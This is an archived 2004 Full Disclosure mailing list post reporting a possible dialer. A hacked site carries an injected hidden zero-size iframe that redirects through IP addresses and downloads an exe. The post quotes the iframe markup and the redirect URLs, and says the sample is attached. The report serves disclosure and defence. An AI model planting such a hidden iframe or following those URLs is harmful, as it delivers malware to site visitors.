Full Disclosure mailing list archives
Possible dialer on 62.4.84.150
From: "Daniel Bartlett" <danbuk_fd () warpmail net>
Date: Tue, 17 Aug 2004 19:47:03 +0100
Hi All, I've only looked at this for about 3 mins, so there isn't a lot to tell.
From a website that looks like someone has hacked it and added a IFRAME
to the top of the page: <iframe FRAMEBORDER="0" width="0" height="0" src="http://213.158.119.103/iframe.php?xid=111"></iframe>
From this frame it gets bounced onto:
http://62.4.84.150/data/start.php?id=111-b&aid=0 then onto: http://62.4.84.150/data/start.php?id=111-download&aid=0 which then downloads a 17984b exe file. I've attached a strings output from the exe, and a copy of the exe(password for zip is lamedial). I hope someone else can shead more light on this than I can. Cheers, Daniel B. -- Daniel Bartlett danbuk_fd () warpmail net
Attachment:
lamedial.zip
Description:
Attachment:
lamedial-strings.txt
Description:
Current thread:
- Possible dialer on 62.4.84.150 Daniel Bartlett (Aug 17)
- RE: Possible dialer on 62.4.84.150 Aditya, ALD [Aditya Lalit Deshmukh] (Aug 21)